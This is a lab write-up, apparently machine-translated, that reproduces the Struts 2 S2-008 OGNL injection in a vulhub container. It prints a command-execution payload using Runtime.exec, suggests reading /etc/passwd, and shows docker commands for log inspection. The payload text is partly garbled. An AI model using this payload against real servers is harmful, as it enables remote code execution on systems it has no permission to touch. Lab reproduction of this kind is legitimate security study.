CVE-2012-0391 S2-008 reproduction

Posted by shivani.shm on Thu, 02 Dec 2021 05:08:47 +0100

0X00 introduction

The butterfly died on the road and thought hidden by the cloud. Some people work hard and will forget in a few years. Some people are always by their side, whether they live or die--- Liu shisan by Zhang Jiajia

Liu, thirteen. Stay, lose?

Cheng Shuang, in pairs.

Two generations are finally separated, and one mind becomes double--- Zhang Jiajia's "there's a canteen by yunbian"

0X01 environment construction

Target: CentOS Linux 7

Attacker: Windows Server 2016 & & Kail

Environment: vulhub

Project address:

To build a vulhub, please visit: Blank centos7 64 build vulhub (detailed)

0X02 vulnerability description

S2-008 involves multiple vulnerabilities. The incorrect configuration of Cookie interceptor can cause the execution of OGNL expression. However, since most Web containers (such as Tomcat) have character restrictions on Cookie names, some key characters cannot be used, which makes this point more difficult. Another weak point is that after the devMode mode is enabled in the struts 2 application, multiple debugging interfaces can directly view object information or execute commands. As kxlzx mentioned, this situation is almost impossible in the production environment, so it becomes very weak, but I don't think it is absolute, In case of being hacked, it is also possible to use an application with debug mode on the server as a back door.

Causes of vulnerability:

The main advantage is that there are no strict restrictions on the incoming parameters, resulting in the execution of malicious code in multiple places.

In fact, the first case is S2-007. During exception handling, OGNL executes the second kind of cookie. Although struts 2 does not restrict malicious code, java webserver (Tomcat) has more restrictions on the name of the cookie and is processed before it is passed into struts 2, so it is more difficult. The third need to turn on devModedebug mode.

For example, adding parameters directly in devMode mode? Debug = Command & expression = the following OGNL expression will be executed directly

Affected version: Struts 2.1.0 - Struts 2.3.1

0X03 - vulnerability recurrence

01 - arbitrary command execution

If the page does not refresh, clear the history. whoami is a variable and can be changed, for example: cat /etc/passwd


#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),#b=new,#c=new,#d=new char[50000],,#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()

url encoding:


0X04 tool detection

Tool address:

0X05 - view log

docker ps #View container ID
docker exec -it ID /bin/bash #get into
cd logs #Enter log directory
cat localhost_access_log.2021-12-02.txt #view log
exit #Exit container

You can see the payload

Think of an operation and use a tool to view the log, because the location when the command is executed is one level above the log folder

Pretend you don't know the contents of the log folder

Try the command CD logs; Ls view log folder contents


Is the command wrong CD logs & & Ls


Change the white box posture and find the path of the log file from the container

cat ./logs/localhost_access_log.2021-12-02.txt

shell view can

Tool view can also:

You can't change a tool

The tool does not seem to support compound commands. You can view the absolute path

0X06 reference

How does linux execute two commands at the same time, and how to run two or more terminal commands at the same time

Struts 2-008 command execution (CVE-2012-0392)

S2-008 Remote Code Execution Vulnerability

Topics: struts2 cve vulhub